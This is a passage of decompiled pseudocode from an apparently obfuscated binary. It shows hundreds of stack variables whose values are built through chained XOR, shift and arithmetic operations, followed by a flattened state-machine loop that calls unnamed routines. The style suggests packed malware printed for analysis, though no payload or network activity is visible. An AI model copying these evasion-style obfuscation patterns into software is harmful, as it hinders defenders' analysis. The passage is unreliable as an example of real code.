                                                                                                                                  				signed int _v236;
                                                                                                                                  				signed int _v240;
                                                                                                                                  				signed int _v244;
                                                                                                                                  				signed int _v248;
                                                                                                                                  				signed int _v252;
                                                                                                                                  				signed int _v256;
                                                                                                                                  				signed int _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				signed int _v268;
                                                                                                                                  				signed int _v272;
                                                                                                                                  				signed int _v276;
                                                                                                                                  				signed int _v280;
                                                                                                                                  				signed int _v284;
                                                                                                                                  				signed int _v288;
                                                                                                                                  				unsigned int _v292;
                                                                                                                                  				signed int _v296;
                                                                                                                                  				signed int _v300;
                                                                                                                                  				signed int _v304;
                                                                                                                                  				signed int _v308;
                                                                                                                                  				signed int _v312;
                                                                                                                                  				signed int _v316;
                                                                                                                                  				signed int _v320;
                                                                                                                                  				signed int _v324;
                                                                                                                                  				signed int _v328;
                                                                                                                                  				signed int _v332;
                                                                                                                                  				signed int _v336;
                                                                                                                                  				signed int _v340;
                                                                                                                                  				signed int _v344;
                                                                                                                                  				signed int _v348;
                                                                                                                                  				signed int _v352;
                                                                                                                                  				signed int _v356;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v364;
                                                                                                                                  				signed int _v368;
                                                                                                                                  				signed int _v372;
                                                                                                                                  				signed int _v376;
                                                                                                                                  				signed int _v380;
                                                                                                                                  				signed int _v384;
                                                                                                                                  				signed int _v388;
                                                                                                                                  				signed int _v392;
                                                                                                                                  				unsigned int _v396;
                                                                                                                                  				signed int _v400;
                                                                                                                                  				signed int _v404;
                                                                                                                                  				signed int _v408;
                                                                                                                                  				signed int _v412;
                                                                                                                                  				signed int _v416;
                                                                                                                                  				signed int _v420;
                                                                                                                                  				signed int _v424;
                                                                                                                                  				signed int _v428;
                                                                                                                                  				signed int _v432;
                                                                                                                                  				signed int _v436;
                                                                                                                                  				signed int _v440;
                                                                                                                                  				signed int _v444;
                                                                                                                                  				signed int _v448;
                                                                                                                                  				signed int _v452;
                                                                                                                                  				signed int _v456;
                                                                                                                                  				signed int _v460;
                                                                                                                                  				signed int _v464;
                                                                                                                                  				signed int _v468;
                                                                                                                                  				signed int _v472;
                                                                                                                                  				signed int _v476;
                                                                                                                                  				signed int _v480;
                                                                                                                                  				unsigned int _v484;
                                                                                                                                  				unsigned int _v488;
                                                                                                                                  				signed int _v492;
                                                                                                                                  				signed int _v496;
                                                                                                                                  				signed int _v500;
                                                                                                                                  				signed int _v504;
                                                                                                                                  				signed int _v508;
                                                                                                                                  				unsigned int _v512;
                                                                                                                                  				signed int _v516;
                                                                                                                                  				signed int _v520;
                                                                                                                                  				signed int _v524;
                                                                                                                                  				signed int _v528;
                                                                                                                                  				unsigned int _v532;
                                                                                                                                  				signed int _v536;
                                                                                                                                  				signed int _v540;
                                                                                                                                  				unsigned int _v544;
                                                                                                                                  				signed int _v548;
                                                                                                                                  				unsigned int _v552;
                                                                                                                                  				signed int _v556;
                                                                                                                                  				signed int _v560;
                                                                                                                                  				signed int _v564;
                                                                                                                                  				signed int _v568;
                                                                                                                                  				signed int _v572;
                                                                                                                                  				unsigned int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				unsigned int _v588;
                                                                                                                                  				unsigned int _v592;
                                                                                                                                  				signed int _v596;
                                                                                                                                  				signed int _v600;
                                                                                                                                  				signed int _v604;
                                                                                                                                  				signed int _v608;
                                                                                                                                  				signed int _v612;
                                                                                                                                  				signed int _v616;
                                                                                                                                  				signed int _v620;
                                                                                                                                  				signed int _v624;
                                                                                                                                  				signed int _v628;
                                                                                                                                  				signed int _v632;
                                                                                                                                  				signed int _v636;
                                                                                                                                  				signed int _t1114;
                                                                                                                                  				signed int _t1118;
                                                                                                                                  				signed int _t1122;
                                                                                                                                  				signed int _t1124;
                                                                                                                                  				signed int _t1125;
                                                                                                                                  				signed int _t1130;
                                                                                                                                  				void* _t1134;
                                                                                                                                  				signed int _t1141;
                                                                                                                                  				signed int _t1190;
                                                                                                                                  				signed int _t1191;
                                                                                                                                  				signed int _t1193;
                                                                                                                                  				signed int _t1194;
                                                                                                                                  				signed int _t1195;
                                                                                                                                  				signed int _t1196;
                                                                                                                                  				signed int _t1197;
                                                                                                                                  				signed int _t1198;
                                                                                                                                  				signed int _t1199;
                                                                                                                                  				signed int _t1200;
                                                                                                                                  				signed int _t1201;
                                                                                                                                  				signed int _t1202;
                                                                                                                                  				signed int _t1203;
                                                                                                                                  				signed int _t1204;
                                                                                                                                  				signed int _t1205;
                                                                                                                                  				signed int _t1206;
                                                                                                                                  				signed int _t1207;
                                                                                                                                  				signed int _t1208;
                                                                                                                                  				signed int _t1209;
                                                                                                                                  				signed int _t1210;
                                                                                                                                  				signed int _t1211;
                                                                                                                                  				signed int _t1212;
                                                                                                                                  				signed int _t1213;
                                                                                                                                  				signed int _t1214;
                                                                                                                                  				signed int _t1215;
                                                                                                                                  				signed int _t1313;
                                                                                                                                  				signed int _t1314;
                                                                                                                                  				signed int _t1317;
                                                                                                                                  				signed int _t1343;
                                                                                                                                  				void* _t1345;
                                                                                                                                  				void* _t1348;
                                                                                                                                  				void* _t1349;
                                                                                                                                  				void* _t1350;
                                                                                                                                  
                                                                                                                                  				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
                                                                                                                                  				_v372 = 0xaca17;
                                                                                                                                  				_v372 = _v372 << 9;
                                                                                                                                  				_v372 = _v372 ^ 0xc9927700;
                                                                                                                                  				_v372 = _v372 ^ 0xdc065802;
                                                                                                                                  				_v560 = 0xa158a0;
                                                                                                                                  				_v560 = _v560 + 0xffff5dcd;
                                                                                                                                  				_v560 = _v560 ^ 0x175bafac;
                                                                                                                                  				_v560 = _v560 + 0xffff9e49;
                                                                                                                                  				_v560 = _v560 ^ 0x17fab80a;
                                                                                                                                  				_v288 = 0xd4a9a6;
                                                                                                                                  				_v288 = _v288 >> 3;
                                                                                                                                  				_v288 = _v288 ^ 0x001a9534;
                                                                                                                                  				_v504 = 0xe9a5d3;
                                                                                                                                  				_v504 = _v504 << 0xa;
                                                                                                                                  				_v504 = _v504 | 0xea5982c0;
                                                                                                                                  				_t1190 = 0x5f;
                                                                                                                                  				_v504 = _v504 / _t1190;
                                                                                                                                  				_v504 = _v504 ^ 0x028f5db6;
                                                                                                                                  				_t1317 = 0x5d794ec;
                                                                                                                                  				_v304 = 0x85b0a3;
                                                                                                                                  				_v304 = _v304 | 0x2bca024a;
                                                                                                                                  				_v304 = _v304 ^ 0x2bcc012b;
                                                                                                                                  				_v556 = 0x1ecc82;
                                                                                                                                  				_v556 = _v556 | 0xf08df0d8;
                                                                                                                                  				_v556 = _v556 + 0xa531;
                                                                                                                                  				_v556 = _v556 ^ 0xfe698427;
                                                                                                                                  				_v556 = _v556 ^ 0x0ecdaa65;
                                                                                                                                  				_v300 = 0x8f610e;
                                                                                                                                  				_v300 = _v300 + 0xfe33;
                                                                                                                                  				_v300 = _v300 ^ 0x0094e207;
                                                                                                                                  				_v600 = 0x1cab4a;
                                                                                                                                  				_t1193 = 0x18;
                                                                                                                                  				_v600 = _v600 / _t1193;
                                                                                                                                  				_v600 = _v600 + 0xffff3801;
                                                                                                                                  				_v600 = _v600 + 0x515c;
                                                                                                                                  				_v600 = _v600 ^ 0x0001e7c9;
                                                                                                                                  				_v568 = 0xbab742;
                                                                                                                                  				_v568 = _v568 + 0xcc5d;
                                                                                                                                  				_v568 = _v568 | 0x5c48aa02;
                                                                                                                                  				_t1194 = 0x5e;
                                                                                                                                  				_v568 = _v568 / _t1194;
                                                                                                                                  				_v568 = _v568 ^ 0x00f9db2d;
                                                                                                                                  				_v576 = 0x767b63;
                                                                                                                                  				_v576 = _v576 >> 3;
                                                                                                                                  				_v576 = _v576 + 0xd487;
                                                                                                                                  				_v576 = _v576 >> 0x10;
                                                                                                                                  				_v576 = _v576 ^ 0x00061026;
                                                                                                                                  				_v628 = 0xe4759e;
                                                                                                                                  				_v628 = _v628 ^ 0xa26bb658;
                                                                                                                                  				_v628 = _v628 * 0x1d;
                                                                                                                                  				_v628 = _v628 ^ 0xba259216;
                                                                                                                                  				_v628 = _v628 ^ 0xd068fc76;
                                                                                                                                  				_v500 = 0xe51d81;
                                                                                                                                  				_v500 = _v500 >> 7;
                                                                                                                                  				_v500 = _v500 + 0xc085;
                                                                                                                                  				_v500 = _v500 * 0x6e;
                                                                                                                                  				_v500 = _v500 ^ 0x01113a52;
                                                                                                                                  				_v512 = 0xc902c8;
                                                                                                                                  				_v512 = _v512 >> 3;
                                                                                                                                  				_v512 = _v512 >> 3;
                                                                                                                                  				_v512 = _v512 >> 7;
                                                                                                                                  				_v512 = _v512 ^ 0x0003c164;
                                                                                                                                  				_v532 = 0xda62af;
                                                                                                                                  				_v532 = _v532 ^ 0x7c695b99;
                                                                                                                                  				_v532 = _v532 >> 0xd;
                                                                                                                                  				_v532 = _v532 >> 6;
                                                                                                                                  				_v532 = _v532 ^ 0x0009f043;
                                                                                                                                  				_v604 = 0x69f539;
                                                                                                                                  				_v604 = _v604 << 0xd;
                                                                                                                                  				_v604 = _v604 + 0xffffd530;
                                                                                                                                  				_v604 = _v604 + 0xffffaf77;
                                                                                                                                  				_v604 = _v604 ^ 0x3ead80db;
                                                                                                                                  				_v384 = 0xab9f19;
                                                                                                                                  				_t1195 = 0xf;
                                                                                                                                  				_t1313 = 0x50;
                                                                                                                                  				_v384 = _v384 * 0x15;
                                                                                                                                  				_v384 = _v384 * 9;
                                                                                                                                  				_v384 = _v384 ^ 0x7eb18135;
                                                                                                                                  				_v256 = 0xb5a6bd;
                                                                                                                                  				_v256 = _v256 | 0x1f71a96d;
                                                                                                                                  				_v256 = _v256 ^ 0x1ffe1878;
                                                                                                                                  				_v264 = 0xca80f7;
                                                                                                                                  				_v264 = _v264 ^ 0x226a3f90;
                                                                                                                                  				_v264 = _v264 ^ 0x22af4e12;
                                                                                                                                  				_v432 = 0x1b5a57;
                                                                                                                                  				_v432 = _v432 << 0xa;
                                                                                                                                  				_v432 = _v432 | 0x8c1547fb;
                                                                                                                                  				_v432 = _v432 ^ 0xed77fd98;
                                                                                                                                  				_v312 = 0xf59d00;
                                                                                                                                  				_v312 = _v312 | 0xee7978e1;
                                                                                                                                  				_v312 = _v312 ^ 0xeef23383;
                                                                                                                                  				_v608 = 0x388a49;
                                                                                                                                  				_v608 = _v608 ^ 0x20b0147d;
                                                                                                                                  				_v608 = _v608 | 0x120a0452;
                                                                                                                                  				_v608 = _v608 / _t1195;
                                                                                                                                  				_v608 = _v608 ^ 0x035d442e;
                                                                                                                                  				_v632 = 0x8bfb5e;
                                                                                                                                  				_v632 = _v632 / _t1313;
                                                                                                                                  				_v632 = _v632 | 0x8005d6ab;
                                                                                                                                  				_v632 = _v632 + 0xbf6f;
                                                                                                                                  				_v632 = _v632 ^ 0x80035879;
                                                                                                                                  				_v624 = 0xe5ec6;
                                                                                                                                  				_v624 = _v624 << 2;
                                                                                                                                  				_v624 = _v624 >> 9;
                                                                                                                                  				_v624 = _v624 | 0xadaec6d6;
                                                                                                                                  				_v624 = _v624 ^ 0xada90310;
                                                                                                                                  				_v392 = 0x144ef;
                                                                                                                                  				_t1196 = 0x44;
                                                                                                                                  				_v392 = _v392 / _t1196;
                                                                                                                                  				_v392 = _v392 + 0xc90b;
                                                                                                                                  				_v392 = _v392 ^ 0x0000cf97;
                                                                                                                                  				_v236 = 0xf3d10d;
                                                                                                                                  				_t1197 = 0x4a;
                                                                                                                                  				_v236 = _v236 * 0x7a;
                                                                                                                                  				_v236 = _v236 ^ 0x74330487;
                                                                                                                                  				_v324 = 0xc3c34b;
                                                                                                                                  				_v324 = _v324 * 0x6c;
                                                                                                                                  				_v324 = _v324 ^ 0x529af392;
                                                                                                                                  				_v520 = 0x2a70ca;
                                                                                                                                  				_v520 = _v520 / _t1197;
                                                                                                                                  				_v520 = _v520 >> 4;
                                                                                                                                  				_v520 = _v520 ^ 0x2a4d5a72;
                                                                                                                                  				_v520 = _v520 ^ 0x2a4dbf28;
                                                                                                                                  				_v340 = 0xc9c056;
                                                                                                                                  				_t1198 = 7;
                                                                                                                                  				_v340 = _v340 * 0x23;
                                                                                                                                  				_v340 = _v340 | 0xe2238341;
                                                                                                                                  				_v340 = _v340 ^ 0xfbb710ef;
                                                                                                                                  				_v248 = 0x9a54c0;
                                                                                                                                  				_v248 = _v248 | 0xe08ac880;
                                                                                                                                  				_v248 = _v248 ^ 0xe09bcbd4;
                                                                                                                                  				_v348 = 0xe0760;
                                                                                                                                  				_v348 = _v348 << 7;
                                                                                                                                  				_v348 = _v348 + 0x49a3;
                                                                                                                                  				_v348 = _v348 ^ 0x070edb7d;
                                                                                                                                  				_v356 = 0xf94015;
                                                                                                                                  				_v356 = _v356 * 0x4d;
                                                                                                                                  				_v356 = _v356 << 1;
                                                                                                                                  				_v356 = _v356 ^ 0x95f7b4be;
                                                                                                                                  				_v320 = 0x1268a5;
                                                                                                                                  				_v320 = _v320 / _t1198;
                                                                                                                                  				_v320 = _v320 ^ 0x00080ceb;
                                                                                                                                  				_v396 = 0xbdcf3e;
                                                                                                                                  				_t1199 = 0x4b;
                                                                                                                                  				_v396 = _v396 * 0x4d;
                                                                                                                                  				_v396 = _v396 >> 2;
                                                                                                                                  				_v396 = _v396 ^ 0x0e48dd39;
                                                                                                                                  				_v596 = 0x7780dd;
                                                                                                                                  				_v596 = _v596 << 0xd;
                                                                                                                                  				_v596 = _v596 | 0xdff7e7fd;
                                                                                                                                  				_v596 = _v596 ^ 0xfff000ad;
                                                                                                                                  				_v492 = 0x5c66b3;
                                                                                                                                  				_v492 = _v492 * 0x2a;
                                                                                                                                  				_v492 = _v492 ^ 0xe8f32aee;
                                                                                                                                  				_v492 = _v492 >> 0xd;
                                                                                                                                  				_v492 = _v492 ^ 0x000eb956;
                                                                                                                                  				_v316 = 0x3e4fae;
                                                                                                                                  				_v316 = _v316 >> 3;
                                                                                                                                  				_v316 = _v316 ^ 0x00075837;
                                                                                                                                  				_v344 = 0xe0dcd8;
                                                                                                                                  				_v344 = _v344 >> 1;
                                                                                                                                  				_v344 = _v344 + 0xffff4400;
                                                                                                                                  				_v344 = _v344 ^ 0x0066aca9;
                                                                                                                                  				_v460 = 0xbe16e8;
                                                                                                                                  				_v460 = _v460 * 0x45;
                                                                                                                                  				_v460 = _v460 ^ 0x56f71a5b;
                                                                                                                                  				_v460 = _v460 / _t1199;
                                                                                                                                  				_v460 = _v460 ^ 0x0158823c;
                                                                                                                                  				_v588 = 0x54b44f;
                                                                                                                                  				_v588 = _v588 ^ 0xc5cf08f3;
                                                                                                                                  				_v588 = _v588 ^ 0x4b1db793;
                                                                                                                                  				_v588 = _v588 >> 0xb;
                                                                                                                                  				_v588 = _v588 ^ 0x00183ace;
                                                                                                                                  				_v524 = 0xbfc9bb;
                                                                                                                                  				_t1200 = 0x67;
                                                                                                                                  				_v524 = _v524 * 0x4d;
                                                                                                                                  				_v524 = _v524 * 0x71;
                                                                                                                                  				_v524 = _v524 << 1;
                                                                                                                                  				_v524 = _v524 ^ 0xed1ab829;
                                                                                                                                  				_v376 = 0x55c29;
                                                                                                                                  				_v376 = _v376 << 0xc;
                                                                                                                                  				_v376 = _v376 ^ 0xdae248eb;
                                                                                                                                  				_v376 = _v376 ^ 0x8f2c7d73;
                                                                                                                                  				_v424 = 0x330008;
                                                                                                                                  				_v424 = _v424 << 0xb;
                                                                                                                                  				_v424 = _v424 / _t1200;
                                                                                                                                  				_v424 = _v424 ^ 0x017d7462;
                                                                                                                                  				_v580 = 0xb4c97;
                                                                                                                                  				_v580 = _v580 | 0x569d8b1e;
                                                                                                                                  				_v580 = _v580 >> 1;
                                                                                                                                  				_t1201 = 3;
                                                                                                                                  				_v580 = _v580 / _t1201;
                                                                                                                                  				_v580 = _v580 ^ 0x0e68230a;
                                                                                                                                  				_v328 = 0x695dff;
                                                                                                                                  				_v328 = _v328 ^ 0x424f14af;
                                                                                                                                  				_v328 = _v328 ^ 0x4224025c;
                                                                                                                                  				_v284 = 0xae8351;
                                                                                                                                  				_t1202 = 0x57;
                                                                                                                                  				_v284 = _v284 * 0x60;
                                                                                                                                  				_v284 = _v284 ^ 0x417e5081;
                                                                                                                                  				_v444 = 0x78eba1;
                                                                                                                                  				_v444 = _v444 * 0x5f;
                                                                                                                                  				_v444 = _v444 ^ 0x00193e0b;
                                                                                                                                  				_v444 = _v444 ^ 0x2cc98685;
                                                                                                                                  				_v592 = 0x15a443;
                                                                                                                                  				_v592 = _v592 / _t1202;
                                                                                                                                  				_v592 = _v592 + 0xffff9c6f;
                                                                                                                                  				_v592 = _v592 >> 5;
                                                                                                                                  				_v592 = _v592 ^ 0x07f20231;
                                                                                                                                  				_v216 = 0x5d0672;
                                                                                                                                  				_v216 = _v216 << 3;
                                                                                                                                  				_v216 = _v216 ^ 0x02ee7d7e;
                                                                                                                                  				_v548 = 0xb50861;
                                                                                                                                  				_v548 = _v548 >> 0xc;
                                                                                                                                  				_v548 = _v548 << 0xf;
                                                                                                                                  				_v548 = _v548 + 0xffffef54;
                                                                                                                                  				_v548 = _v548 ^ 0x05ac6923;
                                                                                                                                  				_v452 = 0x2163b6;
                                                                                                                                  				_v452 = _v452 | 0xbb60e7c3;
                                                                                                                                  				_v452 = _v452 ^ 0x0d3b8c6d;
                                                                                                                                  				_v452 = _v452 ^ 0xb65710e5;
                                                                                                                                  				_v636 = 0x61f3a7;
                                                                                                                                  				_v636 = _v636 + 0xffff300f;
                                                                                                                                  				_v636 = _v636 << 1;
                                                                                                                                  				_v636 = _v636 * 0x27;
                                                                                                                                  				_v636 = _v636 ^ 0x1d9bc7e7;
                                                                                                                                  				_v224 = 0x725254;
                                                                                                                                  				_v224 = _v224 + 0xfffffac1;
                                                                                                                                  				_v224 = _v224 ^ 0x007e9bc6;
                                                                                                                                  				_v228 = 0xd6200c;
                                                                                                                                  				_v228 = _v228 ^ 0x5ef32346;
                                                                                                                                  				_v228 = _v228 ^ 0x5e2a0e2d;
                                                                                                                                  				_v540 = 0xc12668;
                                                                                                                                  				_v540 = _v540 << 8;
                                                                                                                                  				_v540 = _v540 * 0x51;
                                                                                                                                  				_v540 = _v540 + 0xffff6981;
                                                                                                                                  				_v540 = _v540 ^ 0x1d2c502d;
                                                                                                                                  				_v496 = 0x68726f;
                                                                                                                                  				_v496 = _v496 + 0xb8c4;
                                                                                                                                  				_v496 = _v496 + 0xffff3269;
                                                                                                                                  				_v496 = _v496 << 1;
                                                                                                                                  				_v496 = _v496 ^ 0x00d37668;
                                                                                                                                  				_v296 = 0x65f16b;
                                                                                                                                  				_v296 = _v296 ^ 0xac840f83;
                                                                                                                                  				_v296 = _v296 ^ 0xace8f4ad;
                                                                                                                                  				_v336 = 0xf34185;
                                                                                                                                  				_v336 = _v336 + 0xffff7084;
                                                                                                                                  				_v336 = _v336 ^ 0x22f89925;
                                                                                                                                  				_v336 = _v336 ^ 0x2207d32f;
                                                                                                                                  				_v400 = 0x9220b0;
                                                                                                                                  				_v400 = _v400 | 0xa2c46701;
                                                                                                                                  				_v400 = _v400 + 0x1a14;
                                                                                                                                  				_v400 = _v400 ^ 0xa2d5ce26;
                                                                                                                                  				_v368 = 0x18190f;
                                                                                                                                  				_v368 = _v368 * 0x6c;
                                                                                                                                  				_t1203 = 0x47;
                                                                                                                                  				_v368 = _v368 * 0x49;
                                                                                                                                  				_v368 = _v368 ^ 0xe62bbbec;
                                                                                                                                  				_v276 = 0x664929;
                                                                                                                                  				_v276 = _v276 + 0xffffab3c;
                                                                                                                                  				_v276 = _v276 ^ 0x0066f8be;
                                                                                                                                  				_v420 = 0x55fac4;
                                                                                                                                  				_v420 = _v420 / _t1203;
                                                                                                                                  				_v420 = _v420 | 0x23698c02;
                                                                                                                                  				_v420 = _v420 ^ 0x23676b12;
                                                                                                                                  				_v428 = 0x2d8f3d;
                                                                                                                                  				_v428 = _v428 ^ 0xcbbc8554;
                                                                                                                                  				_v428 = _v428 + 0xffff5f5b;
                                                                                                                                  				_v428 = _v428 ^ 0xcb969d3b;
                                                                                                                                  				_v408 = 0x7d0ed3;
                                                                                                                                  				_t1204 = 0x33;
                                                                                                                                  				_v408 = _v408 / _t1204;
                                                                                                                                  				_v408 = _v408 ^ 0x03ccba73;
                                                                                                                                  				_v408 = _v408 ^ 0x03c41a74;
                                                                                                                                  				_v212 = 0xf1bcf;
                                                                                                                                  				_v212 = _v212 | 0xafbe7d4b;
                                                                                                                                  				_v212 = _v212 ^ 0xafbe5483;
                                                                                                                                  				_v476 = 0x76a0ac;
                                                                                                                                  				_v476 = _v476 << 0xa;
                                                                                                                                  				_v476 = _v476 << 2;
                                                                                                                                  				_v476 = _v476 >> 6;
                                                                                                                                  				_v476 = _v476 ^ 0x01aadd1c;
                                                                                                                                  				_v252 = 0xacd74c;
                                                                                                                                  				_v252 = _v252 + 0xffffc13c;
                                                                                                                                  				_v252 = _v252 ^ 0x00a0cd5e;
                                                                                                                                  				_v232 = 0x48ff42;
                                                                                                                                  				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E002E66CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E002E1FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E002F0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E002E95FA();
									_t1122 = E002E1FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
                                                                                                                                  								}
                                                                                                                                  								_t1125 = E002EC110(_v336,  &_v152, _v400, _v368);
                                                                                                                                  								_t1317 = 0x6eeee91;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								_t1125 = E002D59F2();
                                                                                                                                  								__eflags = _t1125;
                                                                                                                                  								if(_t1125 == 0) {
                                                                                                                                  									L114:
                                                                                                                                  									return _t1125;
                                                                                                                                  								}
                                                                                                                                  								_t1317 = 0x56efd44;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x3fc5519;
